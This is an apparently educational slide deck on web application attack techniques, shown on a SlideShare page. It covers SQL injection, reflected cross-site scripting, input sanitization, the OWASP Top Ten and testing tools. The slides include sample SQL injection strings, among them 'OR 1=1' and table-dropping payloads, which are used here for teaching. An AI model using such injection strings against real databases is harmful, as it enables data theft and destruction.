SlideShare a Scribd company logo

Web Application

Download as PPTX, PDF
P
primeteacher32

Web Application

Career
1 of 9
Chapter 13 Web Application Attack Techniques
 Used in web forms; for example, suppose a web page asked a user to enter an employee’s last name and then retrieved and displayed information about the employee. If a user were to type in the name Smith, the following SQL request would be generated: SELECT * from EmployeeTable WHERE LastName=‘Smith’
 Examples: ◦ SELECT * from EmployeeTable WHERE LastName=‘Smith’ OR 1=1;-- ◦ SELECT * from EmployeeTable WHERE LastName=‘Smith’; drop table EmployeeTable;--  One can even look at, modify, or delete other tables  Solution: Programs on servers should sanitize data before passing them to the database. Whitelist acceptable characters (e.g., alphanumerics) and scrub any other characters (e.g., quotation marks, semi-colons) either by deleting them or by substituting an innocuous replacement (e.g., &lt for the less-than symbol <)
SELECT * from SomeTable WHERE FirstName=‘Robert’); DROP TABLE Students;-- ;-- comments out the pre-programmed ’); to avoid syntax errors
Three components:  An innocent web site (call it Y) that uses browser cookies and that reflects user input back to the user’s browser (e.g., shopping sites that show the user a summary of the order before placing it)  A victim who has an account on the aforementioned web site  An attacker who tricks the victim into clicking on a link (in an e-mail or on another web site) that will send them to site Y; the link will include embedded Javascript
 Victim clicks on malicious link  Malicious script is sent to web site Y and is reflected back without being scrubbed.  Malicious code is executed in user’s browser  Malicious code could: ◦ Send all of the user’s cookies for the site to the attacker ◦ Install a backdoor to the victim’s computer
 Open Web Application Security Project (OWASP) periodically updates a top ten list of web application vulnerabilities  Items chosen based on prevalence, exploitability, detectability, and impact estimates  According to the site’s introductory page, the “data spans over 500,000 vulnerabilities across hundreds of organizations and thousands of applications.”  As the introductory page warns, don’t stop at ten
 Free ◦ OWASP’s Nikto ◦ Paros proxy  Commercial ◦ Burp Suite Pro
 WebGoat

Recommended

Encoding Schemes
Encoding SchemesEncoding Schemes
Encoding Schemesprimeteacher32
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injectionavishkarm
 
Web security 2010
Web security 2010Web security 2010
Web security 2010Alok Babu
 
ieee
ieeeieee
ieeeRadheshyam Dhakad
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
SeanRobertsThesis
SeanRobertsThesisSeanRobertsThesis
SeanRobertsThesisSean Roberts
 
Blind sql injection
Blind sql injectionBlind sql injection
Blind sql injectionKagi Adrian Zinelli
 
Blind sql injection
Blind sql injectionBlind sql injection
Blind sql injectionKagi Adrian Zinelli
 

Recommended

Encoding Schemes
Encoding SchemesEncoding Schemes
Encoding Schemesprimeteacher32
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injectionavishkarm
 
Web security 2010
Web security 2010Web security 2010
Web security 2010Alok Babu
 
ieee
ieeeieee
ieeeRadheshyam Dhakad
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
SeanRobertsThesis
SeanRobertsThesisSeanRobertsThesis
SeanRobertsThesisSean Roberts
 
Blind sql injection
Blind sql injectionBlind sql injection
Blind sql injectionKagi Adrian Zinelli
 
Blind sql injection
Blind sql injectionBlind sql injection
Blind sql injectionKagi Adrian Zinelli
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmersrobin_bene
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Sql injection
Sql injectionSql injection
Sql injectionAshok Kumar
 
Vulnerabilities in Web Applications
Vulnerabilities in Web ApplicationsVulnerabilities in Web Applications
Vulnerabilities in Web ApplicationsVenkat Ramana Reddy Parine
 
Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Vishrut Sharma
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingInMobi Technology
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfyashvirsingh48
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSskyhawk133
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Grand Parade Poland
 
.NET Security Topics
.NET Security Topics.NET Security Topics
.NET Security TopicsShawn Gorrell
 
Sql injection
Sql injectionSql injection
Sql injectionNuruzzaman Milon
 
WebApps_Lecture_15.ppt
WebApps_Lecture_15.pptWebApps_Lecture_15.ppt
WebApps_Lecture_15.pptOmprakashVerma56
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggetsguestbd1cdca
 
SQL Injection and Clickjacking Attack in Web security
SQL Injection and Clickjacking Attack in Web securitySQL Injection and Clickjacking Attack in Web security
SQL Injection and Clickjacking Attack in Web securityMoutasm Tamimi
 
Web security with Eng Ahmed Galal and Eng Ramy saeid
Web security with Eng Ahmed Galal and Eng Ramy saeid Web security with Eng Ahmed Galal and Eng Ramy saeid
Web security with Eng Ahmed Galal and Eng Ramy saeid Ahmed Ghazey
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Web Security
Web SecurityWeb Security
Web SecuritySupankar Banik
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAbhinav Nair
 
Software Development Life Cycle
Software Development Life CycleSoftware Development Life Cycle
Software Development Life Cycleprimeteacher32
 
Variable Scope
Variable ScopeVariable Scope
Variable Scopeprimeteacher32
 

More Related Content

Similar to Web Application

Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmersrobin_bene
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Vishrut Sharma
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingInMobi Technology
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfyashvirsingh48
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSskyhawk133
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Grand Parade Poland
 
.NET Security Topics
.NET Security Topics.NET Security Topics
.NET Security TopicsShawn Gorrell
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggetsguestbd1cdca
 
SQL Injection and Clickjacking Attack in Web security
SQL Injection and Clickjacking Attack in Web securitySQL Injection and Clickjacking Attack in Web security
SQL Injection and Clickjacking Attack in Web securityMoutasm Tamimi
 
Web security with Eng Ahmed Galal and Eng Ramy saeid
Web security with Eng Ahmed Galal and Eng Ramy saeid Web security with Eng Ahmed Galal and Eng Ramy saeid
Web security with Eng Ahmed Galal and Eng Ramy saeid Ahmed Ghazey
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 

Similar to Web Application (20)

Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmers
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Sql injection
Sql injectionSql injection
Sql injection
 
Vulnerabilities in Web Applications
Vulnerabilities in Web ApplicationsVulnerabilities in Web Applications
Vulnerabilities in Web Applications
 
Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdf
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
 
.NET Security Topics
.NET Security Topics.NET Security Topics
.NET Security Topics
 
Sql injection
Sql injectionSql injection
Sql injection
 
WebApps_Lecture_15.ppt
WebApps_Lecture_15.pptWebApps_Lecture_15.ppt
WebApps_Lecture_15.ppt
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
 
SQL Injection and Clickjacking Attack in Web security
SQL Injection and Clickjacking Attack in Web securitySQL Injection and Clickjacking Attack in Web security
SQL Injection and Clickjacking Attack in Web security
 
Web security with Eng Ahmed Galal and Eng Ramy saeid
Web security with Eng Ahmed Galal and Eng Ramy saeid Web security with Eng Ahmed Galal and Eng Ramy saeid
Web security with Eng Ahmed Galal and Eng Ramy saeid
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Web Security
Web SecurityWeb Security
Web Security
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 

More from primeteacher32

Software Development Life Cycle
Software Development Life CycleSoftware Development Life Cycle
Software Development Life Cycleprimeteacher32
 
Introduction to GUIs with guizero
Introduction to GUIs with guizeroIntroduction to GUIs with guizero
Introduction to GUIs with guizeroprimeteacher32
 
Introduction to Repetition Structures
Introduction to Repetition StructuresIntroduction to Repetition Structures
Introduction to Repetition Structuresprimeteacher32
 
Intro to Python with GPIO
Intro to Python with GPIOIntro to Python with GPIO
Intro to Python with GPIOprimeteacher32
 
Variables and Statements
Variables and StatementsVariables and Statements
Variables and Statementsprimeteacher32
 
Variables and User Input
Variables and User InputVariables and User Input
Variables and User Inputprimeteacher32
 
Hardware vs. Software Presentations
Hardware vs. Software PresentationsHardware vs. Software Presentations
Hardware vs. Software Presentationsprimeteacher32
 

More from primeteacher32 (20)

Software Development Life Cycle
Software Development Life CycleSoftware Development Life Cycle
Software Development Life Cycle
 
Variable Scope
Variable ScopeVariable Scope
Variable Scope
 
Returning Data
Returning DataReturning Data
Returning Data
 
Intro to Functions
Intro to FunctionsIntro to Functions
Intro to Functions
 
Introduction to GUIs with guizero
Introduction to GUIs with guizeroIntroduction to GUIs with guizero
Introduction to GUIs with guizero
 
Function Parameters
Function ParametersFunction Parameters
Function Parameters
 
Nested Loops
Nested LoopsNested Loops
Nested Loops
 
Conditional Loops
Conditional LoopsConditional Loops
Conditional Loops
 
Introduction to Repetition Structures
Introduction to Repetition StructuresIntroduction to Repetition Structures
Introduction to Repetition Structures
 
Input Validation
Input ValidationInput Validation
Input Validation
 
Windows File Systems
Windows File SystemsWindows File Systems
Windows File Systems
 
Nesting Conditionals
Nesting ConditionalsNesting Conditionals
Nesting Conditionals
 
Conditionals
ConditionalsConditionals
Conditionals
 
Intro to Python with GPIO
Intro to Python with GPIOIntro to Python with GPIO
Intro to Python with GPIO
 
Variables and Statements
Variables and StatementsVariables and Statements
Variables and Statements
 
Variables and User Input
Variables and User InputVariables and User Input
Variables and User Input
 
Intro to Python
Intro to PythonIntro to Python
Intro to Python
 
Raspberry Pi
Raspberry PiRaspberry Pi
Raspberry Pi
 
Hardware vs. Software Presentations
Hardware vs. Software PresentationsHardware vs. Software Presentations
Hardware vs. Software Presentations
 
Block chain security
Block chain securityBlock chain security
Block chain security
 

Recently uploaded

如何办理(CBU毕业证书)浸会大学毕业证成绩单原件一模一样
如何办理(CBU毕业证书)浸会大学毕业证成绩单原件一模一样如何办理(CBU毕业证书)浸会大学毕业证成绩单原件一模一样
如何办理(CBU毕业证书)浸会大学毕业证成绩单原件一模一样qyguxu
 
如何办理(NEU毕业证书)东北大学毕业证成绩单本科硕士学位证留信学历认证
如何办理(NEU毕业证书)东北大学毕业证成绩单本科硕士学位证留信学历认证如何办理(NEU毕业证书)东北大学毕业证成绩单本科硕士学位证留信学历认证
如何办理(NEU毕业证书)东北大学毕业证成绩单本科硕士学位证留信学历认证gakamzu
 
如何办理(USYD毕业证书)悉尼大学毕业证成绩单原件一模一样
如何办理(USYD毕业证书)悉尼大学毕业证成绩单原件一模一样如何办理(USYD毕业证书)悉尼大学毕业证成绩单原件一模一样
如何办理(USYD毕业证书)悉尼大学毕业证成绩单原件一模一样qyguxu
 
Career opportunities after 12th Science 2024 Biology group
Career opportunities after 12th Science 2024 Biology groupCareer opportunities after 12th Science 2024 Biology group
Career opportunities after 12th Science 2024 Biology groupMohmmedirfan Momin
 
Rahul Chauhan - Data Scientist Resume.pdf
Rahul Chauhan - Data Scientist Resume.pdfRahul Chauhan - Data Scientist Resume.pdf
Rahul Chauhan - Data Scientist Resume.pdfrach3246
 
Crafting an effective CV for AYUSH Doctors.pdf
Crafting an effective CV for AYUSH Doctors.pdfCrafting an effective CV for AYUSH Doctors.pdf
Crafting an effective CV for AYUSH Doctors.pdfShri Dr Arul Selvan
 
如何办理(EUR毕业证书)鹿特丹伊拉斯姆斯大学毕业证成绩单原件一模一样
如何办理(EUR毕业证书)鹿特丹伊拉斯姆斯大学毕业证成绩单原件一模一样如何办理(EUR毕业证书)鹿特丹伊拉斯姆斯大学毕业证成绩单原件一模一样
如何办理(EUR毕业证书)鹿特丹伊拉斯姆斯大学毕业证成绩单原件一模一样qyguxu
 
如何办理(UST毕业证书)圣托马斯大学毕业证成绩单本科硕士学位证留信学历认证
如何办理(UST毕业证书)圣托马斯大学毕业证成绩单本科硕士学位证留信学历认证如何办理(UST毕业证书)圣托马斯大学毕业证成绩单本科硕士学位证留信学历认证
如何办理(UST毕业证书)圣托马斯大学毕业证成绩单本科硕士学位证留信学历认证gkyvm
 
We’re looking for a Technology consultant to join our Team!
We’re looking for a Technology consultant to join our Team!We’re looking for a Technology consultant to join our Team!
We’re looking for a Technology consultant to join our Team!Juli Boned
 
Prest Reed Portfolio revamp Full Sail Presentation 2
Prest Reed Portfolio revamp Full Sail Presentation 2Prest Reed Portfolio revamp Full Sail Presentation 2
Prest Reed Portfolio revamp Full Sail Presentation 25203records
 
如何办理(UW毕业证书)滑铁卢大学毕业证成绩单原件一模一样
如何办理(UW毕业证书)滑铁卢大学毕业证成绩单原件一模一样如何办理(UW毕业证书)滑铁卢大学毕业证成绩单原件一模一样
如何办理(UW毕业证书)滑铁卢大学毕业证成绩单原件一模一样qyguxu
 
一比一原版赫尔大学毕业证如何办理
一比一原版赫尔大学毕业证如何办理一比一原版赫尔大学毕业证如何办理
一比一原版赫尔大学毕业证如何办理F
 
如何办理(laurentian毕业证书)劳伦森大学毕业证成绩单原件一模一样
如何办理(laurentian毕业证书)劳伦森大学毕业证成绩单原件一模一样如何办理(laurentian毕业证书)劳伦森大学毕业证成绩单原件一模一样
如何办理(laurentian毕业证书)劳伦森大学毕业证成绩单原件一模一样muwyto
 
freight Final Review 5.13.pptx freight Final Review 5.13.pptx
freight Final Review 5.13.pptx freight Final Review 5.13.pptxfreight Final Review 5.13.pptx freight Final Review 5.13.pptx
freight Final Review 5.13.pptx freight Final Review 5.13.pptxSheldon Byron
 
Sales Experience Presentation - Angel Lopez
Sales Experience Presentation - Angel LopezSales Experience Presentation - Angel Lopez
Sales Experience Presentation - Angel LopezInfinity Skies Corp
 
如何办理(UIUC毕业证书)UIUC毕业证香槟分校毕业证成绩单本科硕士学位证留信学历认证
如何办理(UIUC毕业证书)UIUC毕业证香槟分校毕业证成绩单本科硕士学位证留信学历认证如何办理(UIUC毕业证书)UIUC毕业证香槟分校毕业证成绩单本科硕士学位证留信学历认证
如何办理(UIUC毕业证书)UIUC毕业证香槟分校毕业证成绩单本科硕士学位证留信学历认证gakamzu
 
如何办理(CCA毕业证书)加利福尼亚艺术学院毕业证成绩单原件一模一样
如何办理(CCA毕业证书)加利福尼亚艺术学院毕业证成绩单原件一模一样如何办理(CCA毕业证书)加利福尼亚艺术学院毕业证成绩单原件一模一样
如何办理(CCA毕业证书)加利福尼亚艺术学院毕业证成绩单原件一模一样qyguxu
 
BLAHALIFHKSDFOILEWKHJSFDNLDSKFN,DLFKNFMELKFJAERPIOAL
BLAHALIFHKSDFOILEWKHJSFDNLDSKFN,DLFKNFMELKFJAERPIOALBLAHALIFHKSDFOILEWKHJSFDNLDSKFN,DLFKNFMELKFJAERPIOAL
BLAHALIFHKSDFOILEWKHJSFDNLDSKFN,DLFKNFMELKFJAERPIOALCaitlinCummins3
 
如何办理(UW毕业证书)西雅图华盛顿大学毕业证成绩单原件一模一样
如何办理(UW毕业证书)西雅图华盛顿大学毕业证成绩单原件一模一样如何办理(UW毕业证书)西雅图华盛顿大学毕业证成绩单原件一模一样
如何办理(UW毕业证书)西雅图华盛顿大学毕业证成绩单原件一模一样muwyto
 
如何办理(Galway毕业证书)爱尔兰高威大学毕业证成绩单原件一模一样
如何办理(Galway毕业证书)爱尔兰高威大学毕业证成绩单原件一模一样如何办理(Galway毕业证书)爱尔兰高威大学毕业证成绩单原件一模一样
如何办理(Galway毕业证书)爱尔兰高威大学毕业证成绩单原件一模一样qyguxu
 

Recently uploaded (20)

如何办理(CBU毕业证书)浸会大学毕业证成绩单原件一模一样
如何办理(CBU毕业证书)浸会大学毕业证成绩单原件一模一样如何办理(CBU毕业证书)浸会大学毕业证成绩单原件一模一样
如何办理(CBU毕业证书)浸会大学毕业证成绩单原件一模一样
 
如何办理(NEU毕业证书)东北大学毕业证成绩单本科硕士学位证留信学历认证
如何办理(NEU毕业证书)东北大学毕业证成绩单本科硕士学位证留信学历认证如何办理(NEU毕业证书)东北大学毕业证成绩单本科硕士学位证留信学历认证
如何办理(NEU毕业证书)东北大学毕业证成绩单本科硕士学位证留信学历认证
 
如何办理(USYD毕业证书)悉尼大学毕业证成绩单原件一模一样
如何办理(USYD毕业证书)悉尼大学毕业证成绩单原件一模一样如何办理(USYD毕业证书)悉尼大学毕业证成绩单原件一模一样
如何办理(USYD毕业证书)悉尼大学毕业证成绩单原件一模一样
 
Career opportunities after 12th Science 2024 Biology group
Career opportunities after 12th Science 2024 Biology groupCareer opportunities after 12th Science 2024 Biology group
Career opportunities after 12th Science 2024 Biology group
 
Rahul Chauhan - Data Scientist Resume.pdf
Rahul Chauhan - Data Scientist Resume.pdfRahul Chauhan - Data Scientist Resume.pdf
Rahul Chauhan - Data Scientist Resume.pdf
 
Crafting an effective CV for AYUSH Doctors.pdf
Crafting an effective CV for AYUSH Doctors.pdfCrafting an effective CV for AYUSH Doctors.pdf
Crafting an effective CV for AYUSH Doctors.pdf
 
如何办理(EUR毕业证书)鹿特丹伊拉斯姆斯大学毕业证成绩单原件一模一样
如何办理(EUR毕业证书)鹿特丹伊拉斯姆斯大学毕业证成绩单原件一模一样如何办理(EUR毕业证书)鹿特丹伊拉斯姆斯大学毕业证成绩单原件一模一样
如何办理(EUR毕业证书)鹿特丹伊拉斯姆斯大学毕业证成绩单原件一模一样
 
如何办理(UST毕业证书)圣托马斯大学毕业证成绩单本科硕士学位证留信学历认证
如何办理(UST毕业证书)圣托马斯大学毕业证成绩单本科硕士学位证留信学历认证如何办理(UST毕业证书)圣托马斯大学毕业证成绩单本科硕士学位证留信学历认证
如何办理(UST毕业证书)圣托马斯大学毕业证成绩单本科硕士学位证留信学历认证
 
We’re looking for a Technology consultant to join our Team!
We’re looking for a Technology consultant to join our Team!We’re looking for a Technology consultant to join our Team!
We’re looking for a Technology consultant to join our Team!
 
Prest Reed Portfolio revamp Full Sail Presentation 2
Prest Reed Portfolio revamp Full Sail Presentation 2Prest Reed Portfolio revamp Full Sail Presentation 2
Prest Reed Portfolio revamp Full Sail Presentation 2
 
如何办理(UW毕业证书)滑铁卢大学毕业证成绩单原件一模一样
如何办理(UW毕业证书)滑铁卢大学毕业证成绩单原件一模一样如何办理(UW毕业证书)滑铁卢大学毕业证成绩单原件一模一样
如何办理(UW毕业证书)滑铁卢大学毕业证成绩单原件一模一样
 
一比一原版赫尔大学毕业证如何办理
一比一原版赫尔大学毕业证如何办理一比一原版赫尔大学毕业证如何办理
一比一原版赫尔大学毕业证如何办理
 
如何办理(laurentian毕业证书)劳伦森大学毕业证成绩单原件一模一样
如何办理(laurentian毕业证书)劳伦森大学毕业证成绩单原件一模一样如何办理(laurentian毕业证书)劳伦森大学毕业证成绩单原件一模一样
如何办理(laurentian毕业证书)劳伦森大学毕业证成绩单原件一模一样
 
freight Final Review 5.13.pptx freight Final Review 5.13.pptx
freight Final Review 5.13.pptx freight Final Review 5.13.pptxfreight Final Review 5.13.pptx freight Final Review 5.13.pptx
freight Final Review 5.13.pptx freight Final Review 5.13.pptx
 
Sales Experience Presentation - Angel Lopez
Sales Experience Presentation - Angel LopezSales Experience Presentation - Angel Lopez
Sales Experience Presentation - Angel Lopez
 
如何办理(UIUC毕业证书)UIUC毕业证香槟分校毕业证成绩单本科硕士学位证留信学历认证
如何办理(UIUC毕业证书)UIUC毕业证香槟分校毕业证成绩单本科硕士学位证留信学历认证如何办理(UIUC毕业证书)UIUC毕业证香槟分校毕业证成绩单本科硕士学位证留信学历认证
如何办理(UIUC毕业证书)UIUC毕业证香槟分校毕业证成绩单本科硕士学位证留信学历认证
 
如何办理(CCA毕业证书)加利福尼亚艺术学院毕业证成绩单原件一模一样
如何办理(CCA毕业证书)加利福尼亚艺术学院毕业证成绩单原件一模一样如何办理(CCA毕业证书)加利福尼亚艺术学院毕业证成绩单原件一模一样
如何办理(CCA毕业证书)加利福尼亚艺术学院毕业证成绩单原件一模一样
 
BLAHALIFHKSDFOILEWKHJSFDNLDSKFN,DLFKNFMELKFJAERPIOAL
BLAHALIFHKSDFOILEWKHJSFDNLDSKFN,DLFKNFMELKFJAERPIOALBLAHALIFHKSDFOILEWKHJSFDNLDSKFN,DLFKNFMELKFJAERPIOAL
BLAHALIFHKSDFOILEWKHJSFDNLDSKFN,DLFKNFMELKFJAERPIOAL
 
如何办理(UW毕业证书)西雅图华盛顿大学毕业证成绩单原件一模一样
如何办理(UW毕业证书)西雅图华盛顿大学毕业证成绩单原件一模一样如何办理(UW毕业证书)西雅图华盛顿大学毕业证成绩单原件一模一样
如何办理(UW毕业证书)西雅图华盛顿大学毕业证成绩单原件一模一样
 
如何办理(Galway毕业证书)爱尔兰高威大学毕业证成绩单原件一模一样
如何办理(Galway毕业证书)爱尔兰高威大学毕业证成绩单原件一模一样如何办理(Galway毕业证书)爱尔兰高威大学毕业证成绩单原件一模一样
如何办理(Galway毕业证书)爱尔兰高威大学毕业证成绩单原件一模一样
 

Web Application

  • 1. Chapter 13 Web Application Attack Techniques
  • 2.  Used in web forms; for example, suppose a web page asked a user to enter an employee’s last name and then retrieved and displayed information about the employee. If a user were to type in the name Smith, the following SQL request would be generated: SELECT * from EmployeeTable WHERE LastName=‘Smith’
  • 3.  Examples: ◦ SELECT * from EmployeeTable WHERE LastName=‘Smith’ OR 1=1;-- ◦ SELECT * from EmployeeTable WHERE LastName=‘Smith’; drop table EmployeeTable;--  One can even look at, modify, or delete other tables  Solution: Programs on servers should sanitize data before passing them to the database. Whitelist acceptable characters (e.g., alphanumerics) and scrub any other characters (e.g., quotation marks, semi-colons) either by deleting them or by substituting an innocuous replacement (e.g., &lt for the less-than symbol <)
  • 4. SELECT * from SomeTable WHERE FirstName=‘Robert’); DROP TABLE Students;-- ;-- comments out the pre-programmed ’); to avoid syntax errors
  • 5. Three components:  An innocent web site (call it Y) that uses browser cookies and that reflects user input back to the user’s browser (e.g., shopping sites that show the user a summary of the order before placing it)  A victim who has an account on the aforementioned web site  An attacker who tricks the victim into clicking on a link (in an e-mail or on another web site) that will send them to site Y; the link will include embedded Javascript
  • 6.  Victim clicks on malicious link  Malicious script is sent to web site Y and is reflected back without being scrubbed.  Malicious code is executed in user’s browser  Malicious code could: ◦ Send all of the user’s cookies for the site to the attacker ◦ Install a backdoor to the victim’s computer
  • 7.  Open Web Application Security Project (OWASP) periodically updates a top ten list of web application vulnerabilities  Items chosen based on prevalence, exploitability, detectability, and impact estimates  According to the site’s introductory page, the “data spans over 500,000 vulnerabilities across hundreds of organizations and thousands of applications.”  As the introductory page warns, don’t stop at ten
  • 8.  Free ◦ OWASP’s Nikto ◦ Paros proxy  Commercial ◦ Burp Suite Pro

Editor's Notes

  1. Taken from http://imgs.xkcd.com/comics/exploits_of_a_mom.png